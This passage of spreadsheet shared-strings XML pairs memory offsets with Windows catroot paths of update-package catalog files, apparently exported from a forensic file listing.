    <t>0xdf6cb1c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_85_for_KB2773072~31bf</t>
  </si>
  <si>
    <t>0xdf6cb300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_86_for_KB2813347~31bf</t>
  </si>
  <si>
    <t>0xdf6cb638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_84_for_KB3172605~31bf</t>
  </si>
  <si>
    <t>0xdf6cb810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_84_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6cbb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_842_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6cbe40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_841_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6cbf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_84_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6cc178</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_86_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6cc490</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_86_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6cc7a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_86_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6cc8e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_87_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6ccac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_85_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6ccdd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_85_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6cd0f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2729094~31bf3</t>
  </si>
  <si>
    <t>0xdf6cd4d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_88_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6cd618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2857650~31bf3</t>
  </si>
  <si>
    <t>0xdf6cd7f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_88_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf6cdb08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_87_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf6cdc48</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2685813~31bf3</t>
  </si>
  <si>
    <t>0xdf6cdf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_87_for_KB2973351~31bf</t>
  </si>
  <si>
    <t>0xdf6ce148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6ce460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2985461~31bf3</t>
  </si>
  <si>
    <t>0xdf6ce7a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2843630~31bf3</t>
  </si>
  <si>
    <t>0xdf6ceac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2813347~31bf3</t>
  </si>
  <si>
    <t>0xdf6cec00</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_9_for_KB2761217~31bf3</t>
  </si>
  <si>
    <t>0xdf6cedd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_8_for_KB2773072~31bf3</t>
  </si>
  <si>
    <t>0xdf6cf1d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2479943~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.0.c</t>
  </si>
  <si>
    <t>0xdf6cf3a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2425227_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6cf788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2385678_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6cfaa0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_9_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6cfdd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_99_for_KB2773072~31bf</t>
  </si>
  <si>
    <t>0xdf6cff18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2425227_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d0028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2385678~31bf385</t>
  </si>
  <si>
    <t>0xdf6d0300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2491683_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d06e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2479943_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d0820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2506212_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d09f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2479943_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d0d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2425227~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.1.c</t>
  </si>
  <si>
    <t>0xdf6d1320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2506928_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d1638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2506212~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.2.c</t>
  </si>
  <si>
    <t>0xdf6d1950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2506212_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d1a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2506928~31bf385</t>
  </si>
  <si>
    <t>~~6.1.2.0.c</t>
  </si>
  <si>
    <t>0xdf6d1c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2491683~31bf385</t>
  </si>
  <si>
    <t>0xdf6d1f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2491683_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d2190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2515325~31bf385</t>
  </si>
  <si>
    <t>0xdf6d2368</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2510531_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d2680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2509553~31bf385</t>
  </si>
  <si>
    <t>0xdf6d2998</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2509553_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d2ad8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2510531_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d2cb0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2509553_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d2f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2506928_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d3300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2532531_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d3440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2533552~31bf385</t>
  </si>
  <si>
    <t>0xdf6d3778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2532531_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d3950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2515325_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d3c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2515325_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d3f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2510531~31bf385</t>
  </si>
  <si>
    <t>0xdf6d42c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2533623~31bf385</t>
  </si>
  <si>
    <t>0xdf6d45d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2533623_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d48f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2533623_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d4af8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534366_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d4cd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2533552_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d4f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2532531~31bf385</t>
  </si>
  <si>
    <t>0xdf6d5258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2547666_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d5638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2545698_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d5778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2552343_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d5950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2545698_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d5c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534366~31bf385</t>
  </si>
  <si>
    <t>0xdf6d5da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2545698~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.3.c</t>
  </si>
  <si>
    <t>0xdf6d5f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534366_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d62f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2560656_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d6608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2552343~31bf385</t>
  </si>
  <si>
    <t>0xdf6d6920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2552343_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d6a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2560656~31bf385</t>
  </si>
  <si>
    <t>0xdf6d6c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2547666~31bf385</t>
  </si>
  <si>
    <t>0xdf6d6ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2547666_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d7148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2579686_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d7320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2564958_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d7638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2563227~31bf385</t>
  </si>
  <si>
    <t>0xdf6d7950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2563227_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d7a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2564958_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d7c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2563227_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d7f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2560656_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d8300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2579686~31bf385</t>
  </si>
  <si>
    <t>0xdf6d8440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2585542~31bf385</t>
  </si>
  <si>
    <t>0xdf6d8778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2579686_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d8950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2574819~31bf385</t>
  </si>
  <si>
    <t>0xdf6d8c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2574819_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d8f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2564958~31bf385</t>
  </si>
  <si>
    <t>0xdf6d9278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2598845~31bf385</t>
  </si>
  <si>
    <t>0xdf6d9590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2598845_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d96d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2604115_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d98a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2598845_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6d9c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2585542_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6d9f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2585542_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6da228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2621440_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6da430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2631813_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6da608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2620704~31bf385</t>
  </si>
  <si>
    <t>0xdf6da920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2620704_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6dac38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2620704_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dad78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2621440_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6daee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2604115~31bf385</t>
  </si>
  <si>
    <t>0xdf6db028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2639308_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6db238</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2639308_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6db7c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2631813_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dbad8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2621440~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.5.c</t>
  </si>
  <si>
    <t>0xdf6dbc48</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2640148_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dbe20</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2631813~31bf385</t>
  </si>
  <si>
    <t>0xdf6dc1e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2647753_SP1~31b</t>
  </si>
  <si>
    <t>~x86~~6.1.4</t>
  </si>
  <si>
    <t>0xdf6dc320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2654428_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dc4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2647753_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dc638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2647753~31bf385</t>
  </si>
  <si>
    <t>~~6.1.4.0.c</t>
  </si>
  <si>
    <t>0xdf6dc810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2640148~31bf385</t>
  </si>
  <si>
    <t>0xdf6dcb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2640148_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6dcee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2639308~31bf385</t>
  </si>
  <si>
    <t>0xdf6dd1c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2654428~31bf385</t>
  </si>
  <si>
    <t>0xdf6dd300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2660075_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dd4d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2654428_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6dd810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2653956~31bf385</t>
  </si>
  <si>
    <t>0xdf6ddb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2653956_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6dde40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2653956_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6de1e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2667402_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6de4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2660075~31bf385</t>
  </si>
  <si>
    <t>0xdf6de638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2667402_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6de810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2660075_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6debd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2656356~31bf385</t>
  </si>
  <si>
    <t>0xdf6deee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2656356_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6df118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685813_SP1~31b</t>
  </si>
  <si>
    <t>.11.ca</t>
  </si>
  <si>
    <t>0xdf6df320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685939_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6df4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685811~31bf385</t>
  </si>
  <si>
    <t>~~6.1.1.11.</t>
  </si>
  <si>
    <t>K_x001B_[142G</t>
  </si>
  <si>
    <t>0xdf6df810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685811_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6dfb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685811_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dfc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685813_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6dfe40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2667402~31bf385</t>
  </si>
  <si>
    <t>0xdf6e01c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2690533_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e04d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2690533_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e0618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2698365_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e0950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685939~31bf385</t>
  </si>
  <si>
    <t>0xdf6e0b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685939_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e0e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2685813~31bf385</t>
  </si>
  <si>
    <t>0xdf6e1118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2703157_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6e1430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2703157_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6e1570</t>
  </si>
  <si>
